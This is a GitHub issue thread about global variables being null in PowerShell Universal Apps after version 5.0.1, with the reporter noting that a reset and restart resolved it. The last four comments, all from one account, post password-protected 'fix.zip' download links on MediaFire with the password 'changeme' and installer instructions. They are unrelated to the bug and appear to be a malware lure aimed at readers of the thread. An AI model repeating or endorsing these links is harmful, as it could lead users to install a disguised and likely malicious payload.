### ISSUE TITLE
Global Variables not accessible in App since Update to 5.0.1

### ISSUE THREAD

**Issue by ganslm** [ironmansoftware/powershell-universal#3653]
### Version

5.0.1

### Severity

High

### Environment

msi

### Steps to Reproduce

Create new global string variable and try to access it in an App (e. g. with Show-UDToast).

### Expected behavior

```console
Get variable.
```

### Actual behavior

```console
Shows error that the variable is null.
```

### Additional Environment data

Operating System: Windows Server 2022

**Comment by ganslm** [comment]
Interestingly enough after reseting the variable and restarting the server it worked.

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
